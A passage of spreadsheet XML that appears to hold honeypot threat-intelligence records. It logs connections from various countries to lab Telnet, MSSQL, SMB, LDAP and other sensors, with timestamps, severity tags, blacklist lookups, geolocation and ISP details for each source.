    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:61f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2725"/>
    <x v="2725"/>
    <s v="NA&amp;&amp;c-68-43-167-79.hsd1.mi.comcast.net"/>
    <x v="0"/>
    <d v="2025-04-07T12:48:04"/>
    <d v="2025-03-29T02:02:09"/>
    <d v="2025-04-07T12:48:04"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Lenawee"/>
    <s v="Clinton"/>
    <s v="4989132"/>
    <s v="49236"/>
    <s v="42.072"/>
    <s v="-83.9716"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc."/>
    <s v="2001-11-29"/>
    <s v="JUMPSTART-1"/>
    <s v="2021-01-25"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1997-09-25 04:00:00"/>
    <s v="2025-09-24 04:00:00"/>
    <s v="2024-09-20 05:10:59"/>
    <s v="['DNS101.COMCAST.NET', 'DNS102.COMCAST.NET', 'DNS103.COMCAST.NET', 'DNS104.COMCAST.NET', 'DNS105.COMCAST.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Comcast Domains"/>
    <x v="13"/>
    <s v="NA"/>
    <s v="1701 JFK Blvd."/>
    <s v="::ffff:442b:a74f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2726"/>
    <x v="2726"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:36:12"/>
    <d v="2025-02-12T17:48:39"/>
    <d v="2025-04-07T12:36:12"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Wayanad"/>
    <s v="Kalpatta"/>
    <s v="1268327"/>
    <s v="NA"/>
    <s v="11.6087"/>
    <s v="76.0834"/>
    <s v="133301"/>
    <s v="DWANIRINN"/>
    <s v="DWANIRINN"/>
    <s v="business"/>
    <s v="E and U Technology Services LLP"/>
    <s v="2016-05-12"/>
    <s v="EANDU"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,62204)}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,62816)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,65289)}&amp;&amp;{Data_SMB:Incoming connection (45.249.171.98,429)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2df9:ab62"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2727"/>
    <x v="2727"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:29:52"/>
    <d v="2025-04-07T12:29:52"/>
    <d v="2025-04-07T12:29:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam']}"/>
    <n v="115"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanchipuram"/>
    <s v="Avadi"/>
    <s v="1278130"/>
    <s v="600054"/>
    <s v="13.1067"/>
    <s v="80.097"/>
    <s v="55824"/>
    <s v="NKN-CORE-NW"/>
    <s v="National Knowledge Network"/>
    <s v="corporate"/>
    <s v="St.peters University"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e8b:bbd1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2728"/>
    <x v="2728"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:27:26"/>
    <d v="2025-02-28T11:34:34"/>
    <d v="2025-04-07T12:27:26"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H46"/>
    <s v="389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="KE"/>
    <s v="Kenya"/>
    <s v="30"/>
    <s v="Nairobi County"/>
    <s v="NA"/>
    <s v="Nairobi"/>
    <s v="184745"/>
    <s v="00100"/>
    <s v="-1.29207"/>
    <s v="36.8219"/>
    <s v="328847"/>
    <s v="THE KONZA TECHNOPOLIS DEVELOPMENT AUTHORITY"/>
    <s v="THE KONZA TECHNOPOLIS DEVELOPMENT AUTHORITY"/>
    <s v="business"/>
    <s v="NewIP 2ND"/>
    <s v="2023-11-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:66d2:957f"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2729"/>
    <x v="2729"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:19:04"/>
    <d v="2025-04-07T10:22:04"/>
    <d v="2025-04-07T12:19:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d6:8b9b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2730"/>
    <x v="2730"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:14:49"/>
    <d v="2025-04-07T12:14:49"/>
    <d v="2025-04-07T12:14:49"/>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3b5c:a9d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2731"/>
    <x v="2731"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:00:59"/>
    <d v="2024-06-25T06:21:11"/>
    <d v="2025-04-07T12:00:59"/>
    <n v="134"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;2419&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:52ed"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2732"/>
    <x v="2732"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:00:46"/>
    <d v="2024-08-26T15:13:15"/>
    <d v="2025-04-07T12:00:46"/>
    <n v="161"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_NTP_H30&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;1080&amp;&amp;123&amp;&amp;5432&amp;&amp;445&amp;&amp;443&amp;&amp;25&amp;&amp;9100&amp;&amp;6667&amp;&amp;45694&amp;&amp;45333&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:91ac"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2733"/>
    <x v="2733"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:00:44"/>
    <d v="2024-07-12T19:02:00"/>
    <d v="2025-04-07T12:00:44"/>
    <n v="138"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55930&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:4210"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2734"/>
    <x v="2734"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:59:14"/>
    <d v="2025-04-07T09:42:25"/>
    <d v="2025-04-07T11:59:14"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (Bishanpura)"/>
    <s v="7279746"/>
    <s v="201307"/>
    <s v="28.6099"/>
    <s v="77.3543"/>
    <s v="45528"/>
    <s v="Tikona Infinet Ltd."/>
    <s v="Tikona Infinet Ltd."/>
    <s v="business"/>
    <s v="Tikona Digital Networks Pvt. Ltd"/>
    <s v="2010-05-05"/>
    <s v="TIKONAIN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:117:7310"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2735"/>
    <x v="2735"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:52:29"/>
    <d v="2025-04-07T11:52:29"/>
    <d v="2025-04-07T11:52:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:feca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2736"/>
    <x v="2736"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:51:32"/>
    <d v="2025-04-07T11:51:32"/>
    <d v="2025-04-07T11:51:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:bf91"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2737"/>
    <x v="2737"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:44:21"/>
    <d v="2025-04-07T11:44:21"/>
    <d v="2025-04-07T11:44:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:3e4d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2738"/>
    <x v="2738"/>
    <s v="NA&amp;&amp;36-236-17-113.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-07T11:21:27"/>
    <d v="2025-04-06T07:12:01"/>
    <d v="2025-04-07T11:21:27"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23&amp;&amp;NA&amp;&amp;60727&amp;&amp;62422"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:24ec:1171"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2739"/>
    <x v="2739"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:01:17"/>
    <d v="2023-08-22T15:00:30"/>
    <d v="2025-04-07T11:01:17"/>
    <n v="1723"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_PJL_H42&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;5900&amp;&amp;9100&amp;&amp;445&amp;&amp;80&amp;&amp;63058&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:8aec"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2740"/>
    <x v="2740"/>
    <s v="220-130-157-62.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:01:03"/>
    <d v="2024-04-22T19:18:31"/>
    <d v="2025-04-07T11:01:03"/>
    <n v="965"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
